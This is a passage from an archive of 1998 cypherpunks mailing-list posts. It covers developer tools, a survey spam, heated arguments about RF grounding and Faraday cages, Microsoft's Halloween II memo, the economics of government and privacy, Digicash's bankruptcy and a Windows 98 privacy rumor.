>   Basic], these tools are incredibly primitive."

How strange! I just talked about that paragraph with a friend of mine and he
missed the EXACT same key words that you did. You LEFT OUT THE KEY WORDS!

The actual message said:

>By the standards of the novice / intermediate developer accustomed to
VB/VS/VC/VJ, these tools are incredibly
>primitive.

Which is completely correct. What I replied to the buddy:

Well they *are* [primitive]. You have to write a MAKEFILE for crying out
loud. You can't go from error messages to the source code / line in your
editor (unless you use Emacs). It's so stupid. Someone could write a simple
(scratch-itch) OSS IDE and dominate the market in no time.

The funny thing is that this was the DOS situation... MS hasn't been out of
"primitive" for that long itself.

Of course for experienced developers, GCC's 140 platforms (w/
cross-compiling) and optimizations and all is killer. But what's the ratio
of less experienced to sophisticated developers?

~mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: prize@survey.com
Date: Fri, 6 Nov 1998 11:02:01 +0800
To: cypherpunks@Algebra.COM
Subject: Holiday Shopping Survey And Contest
Message-ID: <199811051834.SAA16328@survey.survey.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear Internet User,

The holiday season will soon be upon us. Will you be making your list and checking it twice online?    We're curious about what role, if any, the Internet will play in your holiday plans this year.  Share your opinions with us and you could win a free Talking Tommy (from hit Rugrats' TV Show) or Talking Teletubby toy (from popular PBS show).

To join in the holiday fun, go to the survey at:

http://www.survey.com/holshopsur.html

Be sure to include your email address at the end of the survey so we can enter your name in the drawing.  It is not required that any information be provided other than your email address for you to be entered into the drawing.  A complete list of contest rules is attached to the survey.

We will be happy to let you know when the results are ready.

Happy Holidays and good luck on the drawing!

Greg Harmon
Director of Research
World Research




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: prize@survey.com
Date: Fri, 6 Nov 1998 18:16:04 +0800
To: cypherpunks@toad.com
Subject: Holiday Shopping Survey And Contest
Message-ID: <199811051834.SAA16334@survey.survey.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear Internet User,

The holiday season will soon be upon us. Will you be making your list and checking it twice online?    We're curious about what role, if any, the Internet will play in your holiday plans this year.  Share your opinions with us and you could win a free Talking Tommy (from hit Rugrats' TV Show) or Talking Teletubby toy (from popular PBS show).

To join in the holiday fun, go to the survey at:

http://www.survey.com/holshopsur.html

Be sure to include your email address at the end of the survey so we can enter your name in the drawing.  It is not required that any information be provided other than your email address for you to be entered into the drawing.  A complete list of contest rules is attached to the survey.

We will be happy to let you know when the results are ready.

Happy Holidays and good luck on the drawing!

Greg Harmon
Director of Research
World Research




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 6 Nov 1998 09:14:29 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: How to test *your* microwave oven distribution pattern. (fwd)
Message-ID: <199811060036.SAA15709@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 05 Nov 1998 16:24:21 -0800
> From: Michael Motyka <mmotyka@lsil.com>
> Subject: Re: How to test *your* microwave oven distribution pattern.

> Wrong metaphor for RF energy.

You said more than you know with that one.

> It's not water. A ground is not a storm
> drain.

>From the perspective of the flow of charge that is a very good metaphor.
Charge flows from the high charge area to the low charge area *always* and
ground is by definition the lowest charge area there is. Just like water
*always* flows from the high PE to the low PE.

> Imagine two conductive spheres ( earth and moon ? ) and an RF generator
> in a box sitting *peacefully* in space. Classical 3-body problem.

That's gravity, not electrostatics. There are no intractable problems
regarding n-body electrostatics issues as there is with gravity. Now of
course in the real world we can't get one without the other, but you didn't
mention that aspect.

> The DC
> potential that exists between any of them has absolutley no effect on a
> wave travelling anywhere

DC potentials have no effect on a wave anyway, they don't emit photons. They
are a physical representation of a line intergral. The potential between two
points is not effected by the path taken to get between the two points.

> ( unless you want to get into the topic of
> nonlinear materials ). 

Bullshit.

> So forget about everything in the scene except
> that generator in the box.

Then why in hell did you bring it up in the first place.

I smell spin doctor bullshit coming....

> Shielding consists solely of preventing the
> wave from getting out of the box into free space where it can be
> detected. There is nothing special about *any* of the DC references.

There is no wave with DC. If you want to make a wave you have to *move* the
DC field generator or the measurement device.

Now the charge that is *in* the box will leak to the outside of the shield
*even if it's an insulator*, it's called charge tunneling.

> Earth may be special ( source of women and beer ) but not to a wave.

Depends on a wave of what. If we're talking electrostatics then yes Earth is
special. I would direct you to many of Nikola Tesla's work on this exact
topic but you probably wouldn't read it. It's special because the Earth
itself has a charge and that interacts with the charge on the box. If the
charges are opposite they attract and the box moves toward the Earth (the
Earth moves toward the box as well but the delta rho is inconsequential so
we usualy ignore it). If the charges are identical then the two move apart.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 6 Nov 1998 09:21:20 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Grounding (fwd)
Message-ID: <199811060053.SAA15809@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 05 Nov 1998 15:25:21 -0800
> From: Michael Motyka <mmotyka@lsil.com>
> Subject: Re: Grounding

> ***
> Electricity runs from a high-potential point to ground. If it isn't
> grounded
> it radiates away into space where it can be detected. If the Faraday
> Cage
> isn't grounded it simply acts as a parasitic oscillator and re-emits the
> signal from inside, though at a lower amplitude. Remember, charge rests
> on
> the *OUTSIDE* of a object so that any charge picked up internaly gets
> passed
> to the outside surface.
> ***
> 
> Consider a battery-powered spark gap inside a copper box. Lots of
> beautiful wideband noise. I refuse to ground my copper box. I'm going to
> suspend it from a weather balloon over Menwith Hill. 

And you'll build a hell of a charge on it which will travel down the
connecting cable that you have pounded into the Earth. 

> The solutions to the wave equation inside the cavity have a real part ~0
> in the exponent.

It's not a question of a Schroedingers Wave Equation, it's a question of
Maxwell's Equations.

> The boundary condition at the inside surface of the
> copper box splices together the solutions in the cavity and inside the
> conductor.

What conductor? The shell is equipotential unless you're trying to play head
games with me so there follows there can be no current flow through it
except radialy to the outside of the sphere.

Let's walk through it using your model....

The spark gap generates sparks and that builds up free electrons in the
space inside the sphere (whether it is gas filled or a vacuum is
irrelevant). As that charge builds up it will be all of one type, electrons.
Now the electrons repel each other and therefor move in a circular motion
with the spark gap as the center. They strike the surface of the sphere and
tunnel through to the outside surface where they reside. The amount of
charge at any one point is related to the curvature of the surface at that
point. Since a sphere is constant curvature the charge will be evenly
distributed. It will continue to build up so long as you supply power to the
spark gap. In an ideal world it will get bigger and bigger. In the real
world at some point insulation breaks down and normal current flow takes
place.

As to the 3 Laws of Thermodynamics, you should use Heinz Pagels (RIP) as
they are much funnier and a lot easier to understand and apply:

1. You can't break even

2. You can't get ahead

3. You can't quit the game


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 6 Nov 1998 09:07:20 +0800
To: cypherpunks@cyberpass.net
Subject: Halloween II
Message-ID: <v04020a1db267f0dd360f@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Date: Thu, 5 Nov 1998 18:53:46 -0500 (EST)
Reply-To: love@cptech.org
Originator: info-policy-notes@essential.org
Sender: info-policy-notes@essential.org
Precedence: bulk
From: James Love <love@cptech.org>
To: Multiple recipients of list INFO-POLICY-NOTES
<info-policy-notes@essential.org>
Subject: Halloween II
MIME-Version: 1.0
X-Comment: To unsubscribe from this list, send the message "unsubscribe
info-policy-notes" to "listproc@essential.org".  Leave the "Subject:" line
blank.

------------------------------------------------------------
Info-Policy-Notes | News from Consumer Project on Technology
------------------------------------------------------------
November 5, 1998

	Halloween II

	On November 2, 1998 Info-Policy-Notes provided a
link to the so called Halloween document, which detailed
Microsoft's analysis of Linux and other open source
software.  (http://www.tuxedo.org/~esr/halloween.html)
Now Eric Rayond has published a second document which he
has dubbed Halloween II.  This one is on the web at:

   http://www.opensource.org/halloween2.html


Halloween II is authored by Vinod Valloppillil (VinodV),
the author of the Halloween I, and Josh Cohen (JoshCo).
It is dated Aug 11, 1998 , and is version 1.0.  The
heading is:

      Microsoft Confidential
      Linux Operating System
      The Next Java VM?

The document is very interesting.  One line that has gotten a lot of attention
is at the end, where the authors suggest:  "The effect of patents and copyright
in combating Linux remains to be investigated."  The Linux community generally
thinks they can out code Microsoft, so long as they are permitted.  But
there is
a lot of concern over software patents, which are often very broad, poorly
researched by the US government, and expensive to litigate.  Under recent court
cases, there are few barriers to harassment based upon spurious litigation over
patents, so this is a cause for concern.  On a topic discussed at some
length in
Halloween I, Halloween II says by "folding extended functionality into today's
commodity [open standards] services and create new [proprietary] protocols, we
raise the bar & change the rules of the game."  (the brackets added by me).

There is also an interesting article in today's Linux Today:

    Who are all these people behind the
    Halloween document?
    Nov 5th, 12:32:47
    Here's an in-depth look at the personalities
    behind the Halloween documents.
    By Dave Whitinger

    http://linuxtoday.com/stories/638.html


A few other related articles are Tim O'Rielly's Open Letter to Microsoft about
Halloween I, which is on the web at:

http://www.oreilly.com/oreilly/press/tim_msletter.html

and, news that Microsoft has tried to hire Linux hacker Alan Cox.  This
last one
suggests Microsoft is stepping up their campaign to crush the open software
movement.  Here are some excerpts that Alan Cox posted today about the
Halloween
document.

http://www.linux.org.uk/
[snip]

 Its important to realize how fundamental open
 standards are. Most people are probably sitting at a
 PC built with mixed cards from mixed vendors on an
 open standard bus, typing on a keyboard with open
 standard connectors, using an open standard Qwerty
 layout, talking an open standard RS232 serial protocol
 to a modem that talks an open protocol to the ISP. Its
 all running off a standard electricity specification.
 Even your chair is probably held together by open
 standard nuts and bolts. Computing is becoming a
 commodity item and like all commodity items it needs
 to be open, for the consumer and for the long term
 good of the industry as a whole. Linux is open, if there
 is anything you didn't get told you can check the
 source code.

 A couple of other fun things have happened too, the
 I2O SIG developing the next generation high end I/O
 interface for PC's have now made their specification
 open, and Microsoft tried to hire me. I think the I2O
 SIG have the better chance of success here.

 Alan


This is Alan Cox's home page: http://www.linux.org.uk/diary/


	There is also running commentary, much if it entertaining, often rather
speculative, but also a very good source of breaking news on these issues at:

	http://www.slashdot.org

	Finally, CPT will be studying the Halloween documents, and asking
antitrust
authorities to determine if Microsoft's intended plans to corrupt open
standards
violate antitrust laws.  More on this next week.

   Jamie Love <love@cptech.org> 202.387.8030

-------------------------------------------------------------
INFORMATION POLICY NOTES: the Consumer Project on Technology
http://www.cptech.org, 202.387.8030, fax 202.234.5127.
Archives of Info-Policy-Notes are available from
http://www.essential.org/listproc/info-policy-notes/
Subscription requests to listproc@cptech.org with the message:
subscribe info-policy-notes Jane Doe
To be removed from the list, the message should read,
unsub info-policy-notes
-------------------------------------------------------------

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 6 Nov 1998 10:01:01 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone (fwd)
Message-ID: <199811060134.TAA15903@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Matthew James Gering <mgering@ecosystems.net>
> Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone
> 	 (fwd)
> Date: Thu, 5 Nov 1998 13:52:14 -0800 

> > Yes, they are. Can you say 'taxes'?
> 
> Imposed by a gun.

Don't try to change the subject. Just because you don't find taxes
worthwhile doesn't mean others do as well. My bitch is about the amount and
the way it's legislated, not about paying them. I'd sure as hell rather pay
taxes for police, fire, ems, etc. than try to deal with that all myself. If
that were the case we wouldn't have a very high level of society since
nobody would have time to run businesses, write great books, make movies,
develop computers, etc. They'd be too damn busy sneaking up on the deer or
shooting/stealing their neighbors food/wife.

> > Can you say 'interstate commerce'?
> 
> What about it?

It's one of the defining characteristics that allow a government to be a
economic factor in the economic system, contrary to the original thesis.

> > Can you say 'mint money'? Can you say 'federal reserve'?
> 
> Can you say government fiat?

Can you say fucked up non-working economy if there isn't some
standardization of monetary systems? I can see it now if folks like you get
your way. When I go to Louisiana I'll need a whole new currency that I can't
trade my Texas money for. Yep, that's an optimal way to run an economy.

> > Can you say 'FDIC'?
> 
> Can you say banking regulation at the point of a gun?

Don't change the subject (again).

> The Soviet Union is a prime recent example.

How?

> British Mercantilism.

How?

> Governments are ultimately bound to economics in the sense of human behavior
> and productivity -- the more they deny the nature of microeconomic actors,
> the quicker they self-destruct.

Economics *is* human behaviour, the science is the tools that we use to
describe what happens *after* the fact and if we're right we might even be
able to make some small usable predictions about what people in a gross
level will do in the future. If you are trying to extend economics to the
extent of trying to predict the micro-economic actions of individuals then
you don't understand macro or micro economics very well.

> History shows that every dynasty well eventually self-destruct, to think
> ours won't is foolish.

Everything self desctructs at one point or another. Besides this issue is
irrelevant and immaterial to whether it is legitimate to consider a
government as an economic partner in a economic system, and whether that
model for government includes aspects normaly thought of as being a
commercial enterprise.

Again, stay on topic.

> My point is we don't have competitive governments per
> se

You are lost in a dream world, all government are competitive. Ask
Clinton, Hussein, Pinochet, Netanyahuh, etc. Why? Because people are
competitive, it's the way biology works.

>, you have a power void that is filled by new government that can be just
> as hostile to those microeconomic actors. All our government failures have
> yet to produce a sustainable government.

It never happens that way. The *only* time you have a power void is when
there are no governments in the first place. Once they are established other
governments and systems move in to take over the territory. It's quite
biological (which shouldn't surprise anyone) in its behaviour. Usualy a
government ceases because another government (whether internal or external
is irrelevant to the point at hand) moves in and destroys the base of the
original government. It might be by force but the fall of the CCCP clearly
indicates that we are seeing governments change their systems radicaly
without the violence, destruction, and death that historicaly such changes
have required. The fall of the CCCP is a watershed event because it
indicates that government systems can in fact change without these effects,
that is a very hopeful sign.

> > False distinction. Politics is about control and power
> 
> The fundamental laws of economics are supply and demand. As soon as you
> through force into the equation, it is no longer economic, it is political.

No, the fundamental law of economics is greed/desire/want/etc. Supply and
demand is how we describe the consequences of the flow of goods and
services.

Now exactly why you're bringing up economics when the issue in this case was
the base motivations of politics smacks of a strawman.

> > in human society that breaks down to force and money.
> 
> The essence of money has no political roots. The essence of money is human
> productivity and trade.

Oh baloney. There are two aspects of organized human society (ie politics).
Self-defence and self-sufficiency. The first requires brute force and the
second requires some mechanism of trade. For a society to get very large at
all *requires* a generalization of the barter system to a symbolic one, that
symbol is money.

> Money is tied to politics currently because it is regulated by force of
> government and the money *supply* is created by government fiat.

First, the money supply was created by a popular vote, not a government fiat
because there was no government to execute the fiat at the time.

Now as to money being tied to politics, see the paragraph above.

> > There you go again, confusing privacy with economics...
> 
> The discussion *was* *privacy*,

No, the discussion was the viability of modeling a government as a economic
entity within the economic system of a geographic region and what that
meant. There was also a side issue relating privacy and freedom to anarchy.

> discussion? Privacy (as opposed to secrecy) is about discretionary
> disclosure of information.

No, that is respect for privacy. Secrecy is the intentional act of hiding
information that one doesn't want others to discover, not the same horse at
all.

> To invade privacy is to remove or prevent that
> discretion.

No, to invade privacy is to disrespect it. Discretion is knowing when to do
it and not get caught.

> There is an economic cost of doing so, and an economic benefit.

Not necessarily. I can invade my childrens privacy and there is no economic
cost or benefit. My neighbor can rifle my mail and there is no cost one way
or the other (unless they steal my paycheck and that's a whole nother
issue). The government could tap my phone and there would be no economic
impact. Privacy does not require the issue of economics to brought into it
until we begin to discuss economic strategies. It is the issue of money that
brings privacy into the discussion and not the other way around.

> Corporations are bound by those economics, whereas government can mandate
> transparency by whim and gun.

No, it is clear that governments are bound by the will of their citizens,
their economy, geography, and their technology. They are not omnipotent.

> > True, but that isn't a function of regulation per se only the 
> > particular type of regulation that we have implimented.
> 
> It is the *nature* of regulation.

No it isn't. I regulate my dogs behavior and don't use force. Football games
are regulated by rules and they aren't imposed by force. The way my company
works is very regulated but there is no force involved.

No, regulation does not automaticaly imply force. Where force comes into
play is when the issue being regulated effects many individuals and some of
those individuals want the benefits but don't want to pay the costs. They
want a free ride at others expense.

> Government is a natural instrument of collective legalized force by any

This is a non-sequetar, governments define legality they are not defined by
it. There isn't some outside agency that defines what a government will do,
it's internal to the government and its participants.

> group that can influence it, and to think it can't and won't be influenced
> denies human nature in regards to power.

Yeah, so. I don't believe this is relevant since we all agree on this. It's
a function of human nature to try to get in a position of special favor so
at least some rules don't apply to you. It's a competitive advantage.

> Every government is despotic by
> nature, force corrupts. 

People are corruptable, governments are simply the framework they create to
express it.

> > No, they don't. It is perfectly legal for an individual to 
> > own a weapon.
> 
> The legal monopoly on the *initiation* of force.

I got news for you dude, I catch you in my truck after dark or running down
the street with my property I'm perfectly within my rights to initiate
force.

> And in fact you have very
> little freedom (eternally diminishing) to obtain potential force (arms) and
> use it in a *reactionary* manner.

You mean in an insiteful manner. You aren't talking about reacting to
something you're veiled comment is to allow yourself for example to buy a
weapon and kill me (for example) simply because you're pissed off about
something. It surprises you that I and others won't give you that freedom?

> You have absolutely *no* freedom to use it
> reactionary against government (which is in the face of the 4th).
 
			       ARTICLE IV. 
 
	The right of the people to be secure in their persons, houses, 
papers, and effects, against unreasonable searches and seizures, shall 
not be violated, and no Warrants shall issue, but upon probable cause, 
supported by Oath or affirmation, and particularly describing the place 
to be searched, and the persons or things to be seized. 
 
That in fact does allow you to shoot somebody if they enter your home
illegaly, even a police officer. If you're being raped and shoot a cop it's
perfectly legal. If he's beating the shit out of you it's perfectly legal to
defend yourself, even to the point of killing the officer.
 
The problem is your not wanting to use it in immediate self-defence, you're
talking about going out and mowing people down simply because your pissed
off at what they stand for and you can't get your way. Your pissed off, like
all anarchist, that you can't take advantage of people with impunity.

A childish and petulant view.

I'm going to stop now since the rest of your email is more of the same.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Scott Loftesness" <sjl@sjl.net>
Date: Fri, 6 Nov 1998 12:10:09 +0800
To: "Phillip Hallam-Baker" <dcsb@ai.mit.edu>
Subject: RE: Digicash bankruptcy
In-Reply-To: <002401be092a$35bb5b20$bf011712@games>
Message-ID: <004d01be0937$e147c160$0300a8c0@sjl4120>
MIME-Version: 1.0
Content-Type: text/plain



> Phillip Hallam-Baker
> Sent: Thursday, November 05, 1998 6:08 PM
> Subject: RE: Digicash bankruptcy

...

> Finaly I have difficulty regarding Digicash as being all that socially
> responsible. Chaum's problems had a lot to do with the business terms
> he insisted on. What he had was a technology which allowed an improvement
> to a payment system. He imagined he had a monopoly on the only feasible
> solution. He was very baddly mistaken. The monopoly rents he demanded
> were more than the market was willing to pay for a working and deployed
> system - let alone for a patent license.

Where does the "monopoly rents" comment come from?  

In other words, on what basis are you making that statement?

Scott




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 6 Nov 1998 10:15:27 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Who Cares (fwd)
Message-ID: <199811060150.TAA15968@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 5 Nov 1998 11:00:10 -0500
> From: Petro <petro@playboy.com>
> Subject: Re: Who Cares (fwd)

> 	While I won't deny that some of the people who don't vote are in
> the position you claim they are, their not voting has nothing to do with
> their economic position, it has to do with the facts that:

Many of the people are in that situation. Most people don't vote for two
reasons:

1.	It won't significantly effect their lives one way or the other

2.	They don't have time, or at least don't believe they have time.

> 	1) This is a mid-term election. Since it isn't a presidential
> election, fewer really care to research the issues (which are fewer).

Yeah, why? (hint: see 1.)

> 	2) We are currently in decent economic times, and as Terry Pratchet
> noted on Men At Arms, (paraphrasing here) Most people don't really care
> about democrazy, Equal Rights, or any of that, they just want tomorrow to
> be exactly like today.

Then Terry Pratchet is an idiot. People don't want it to stay the same, they
want it to get better. They want more money, a bigger house, better clothes,
a cooler car, etc.

If you and Terry seriously don't believe folks understand democracy (though
they may not act the way you want them to in expressing it) then you should
spend some time talking to people and askign them how much they would take
to get rid of the Constitution, allow cops to wander through their homes at
will, etc.

You're both in for a very rude surprise.

> 	3) As Jimmy notes, there usually isn't much of a difference between
> one canidate and the other (outside of the Natural Law types), and those
> canidates who _are_ different (Libertarians, Socialists &etc. ("reform"
> types don't count, they really are for making tomorrow just like yesterday
> & today, only they ADMIT it for the most part)) either don't get enough
> votes to challenge the status quo, or if there is an issue that will
> challenge the status quo, the number of voters tends to increase (to
> varying degrees).

True, though I'd say the reason that we don't have a more diverse political
venue is because we don't have proportional seating in the various houses.
That was a fundamental fault with the founding fathers, they misunderstood
the homogeneity of peoples view. Of course they didn't have a clue about
television and such causing a global homogeniety. But then again, that is our
cross to bear in living up to 'a more perfect union'.

The one unifying aspect that amazes me about many of you folks on this
mailing list is your complete lack of understanding of your own duty and
responsibilities in this government. You bitch and bitch and yammer about
what's wrong but you have no desire to fix it, your so focused on initiating
violence it's pathetic. When the Constitutuion was written the job was just
begun, it wasn't finished as you seem to imply.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 6 Nov 1998 10:16:49 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Who Cares (fwd)
Message-ID: <199811060151.TAA16014@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 5 Nov 1998 10:49:53 -0500
> From: Petro <petro@playboy.com>
> Subject: Re: Who Cares

> 	The fact that it is meaningful to you means you will never (as long
> as it is meaningful to you) get anywhere as a politician, as you still
> actively beleive that a politican is there to do the will of the people.

Politicians are, unfortunately the problem is the people who becom
politicians.

> 	This can be demonstrated to be a false assumption.

We're waiting....


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "HT1 HOWELL, REESE R-7 X7572  PRD 03/98" <howree@cable.navy.mil>
Date: Thu, 5 Nov 1998 19:47:01 +0800
To: cypherpunks@toad.com
Subject: Re: is it real? 2
In-Reply-To: <19981104113503.B4836@mail.roava.net>
Message-ID: <199811051303.IAA00882@rps1.cable.navy.mil>
MIME-Version: 1.0
Content-Type: text/plain



> On Wed, Nov 04, 1998 at 09:52:29PM -0800, zERoe wrote:
>>for your info, please.
>>
>>Just in case.......
>>......... basically.... don't install Windows 98 ..... since they have
>>this "added" function.....  =)
--snip--

On or around Wed, 4 Nov 1998 entropi wrote:
> While some of the "information" cited in this post is technically possible, as a
> sys admin at a small start-up ISP, I can guarantee you that at least one ISP in the US is not kissing MS's ass in such a fashion.
--snip--

I do not see where the cooperation of the ISP would be required, unless the 
user had used fictitious or obviously false names and company names (where 
required) for the registration of the programs in question.

I for one, find the claims that M$ is doing this entirely believable, it is 
well within the capability of the program to perform this function without the 
user being aware.

what I want to know is, is it just Win98 that does this, or does Win95 (any 
version) with Ie4 do this also???

Reeza!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phillip Hallam-Baker" <hallam@ai.mit.edu>
Date: Fri, 6 Nov 1998 10:39:49 +0800
To: "Robert Hettinga" <dcsb@ai.mit.edu>
Subject: RE: Digicash bankruptcy
In-Reply-To: <v04020a17b267c6f85c06@[139.167.130.246]>
Message-ID: <002401be092a$35bb5b20$bf011712@games>
MIME-Version: 1.0
Content-Type: text/plain



Phil is right in much of what he says but in a couple of cases he
is wrong.

Regarding the 'vortex of buzz technologies', VRML, network computers
and push are certainly not hot properties at the moment, neither is
interactive TV - but the Web was designed as the antithesis of 
Interactive TV. The root failure of Interactive TV was the assumption
that the world wanted to spend its time passively consuming the dross
pumped out through a 1000 channel 120" TV which would dominate the home.

I would also like to add Java onto the pile. Java today is simply
what C++ should have been. It does not revolutionize the programming
industry, it simply provides what some people think is an object
oriented programming environment and removes some of the worst 
legacy clutter of C.

Cryptographic payment systems are here - in the form of credit card
transactions over SSL. The main problem with SET and its competitors
is that SSL works a little too well.

That is not to say that there is no future for SET. SSL and credit
cards are unlikely to make the leap from the consumer market to the
business to business market. SET provides an ideal platform to 
integrate the use of the credit card infrastructure for business
payments.

The other area where I would disagree is over protocols. HTTP is
quite radically different to FTP in that it is a computer client
to computer server protocol. The metaphor of FTP is rumaging through
a filing cabinet. The HTTP and Web mechanism employs a locator.
Admittedly there was nothing to stop a text mode Web being created
in 1982 but nobody did so.

What is true is that the time taken for Internet technologies to move
to market is very slow. Much of the HTTP technology that just reached 
the market was proposed in '92 and '93. 

Finaly I have difficulty regarding Digicash as being all that socially
responsible. Chaum's problems had a lot to do with the business terms
he insisted on. What he had was a technology which allowed an improvement
to a payment system. He imagined he had a monopoly on the only feasible
solution. He was very baddly mistaken. The monopoly rents he demanded
were more than the market was willing to pay for a working and deployed
system - let alone for a patent license.

		Phill







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Fri, 6 Nov 1998 13:43:13 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone (fwd)
Message-ID: <5F152E6E8E6FD21195DF00104B2425AD02B253@yarrowbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain




> > > Yes, they are. Can you say 'taxes'?
> > 
> > Imposed by a gun.
> 
> Don't try to change the subject.

I'm not, taxes are a political transaction, I must pay them whether or not I
demand the service or disservice I receive for them -- taxes are not bound
by supply and demand.

> It's one of the defining characteristics that allow a 
> government to be a economic factor in the economic system

It is the defining excuse for the FEDERAL government to interfere with the
economic system.

> > > Can you say 'mint money'? Can you say 'federal reserve'?
> > 
> > Can you say government fiat?
> 
> Can you say fucked up non-working economy if there isn't some
> standardization of monetary systems? I can see it now if 
> folks like you get your way.

Try studying the free banking era of the Mid 1800's, or the international
exchange markets.

> When I go to Louisiana I'll need a whole new 
> currency that I can't trade my Texas money for.

Why can't you trade your Texas money? Who is to prevent you? Who is to
prevent other from meeting the exchange demand? Who it so prevent people
from accepting it in trade? Clearly with the digitization of money, multiple
currencies are not a problem.

> > > Can you say 'FDIC'?
> > 
> > Can you say banking regulation at the point of a gun?
> 
> Don't change the subject (again).

I'm not, the gun is the defining characteristic that makes it political and
not economic.

> > The Soviet Union is a prime recent example.
> 
> How?

Self-destructed command economy that created prices by fiat instead of
obeying market economics.

> > British Mercantilism.
>
> How?

Self-destructed empire (starting with our war of independence) by creating
artificial trade barriers between the colonies to reap artificial profits at
the colonies expense (which was really at the heart of the revolution, not
taxation nor representation).

> Economics *is* human behaviour

Let's expand the definition to the point it has no meaning. No thank you.
Economics is production and trade; human behavior affects trade, it is not
economics.

> If you are trying to extend economics to the
> extent of trying to predict the micro-economic actions of 
> individuals then you don't understand macro or micro 
> economics very well.

You can predict the actions of groups of individuals if you understand the
nature of individuals. Predicting an individual is left to the soothsayers.

> No, the fundamental law of economics is 
> greed/desire/want/etc.

Okay, you take your laws of greed/want/desire and figure out how to sustain
life.

> Self-defence and self-sufficiency. The first requires brute 
> force and the second requires some mechanism of trade.

No, self-sufficiency by its definition means you are...well...sufficient by
yourself. If you require trade, you are no longer self-sufficient.

> symbol is money.

Money either has intrinsic value, or it is a symbol and debt against
something held of value, or it is a debt on the future acquisition of value
produced by someone else -- i.e. future productivity.

> First, the money supply was created by a popular vote, not a 
> government fiat

Oh, please do tell when/where this popular vote took place.

We've moved from intrinsic value currency to a currency representing hard
value (gold) to something that represents nothing more than faith of
government, and whose supply is controlled by fiat of a *private*
institution -- the Federal Reserve Board.

> > discussion? Privacy (as opposed to secrecy) is about discretionary
> > disclosure of information.

Discretion by you of the disclosure by you of information about you. Make
sense?

The other type of privacy, somehow preventing other people from disclosing
information about you by means other than mutual agreement is privacy of the
statist type.

> > There is an economic cost of doing so, and an economic benefit.
> 
> The government could tap my phone and there would be 
> no economic impact.

No cost, eh? I suggest you take a look at the congressional allocations for
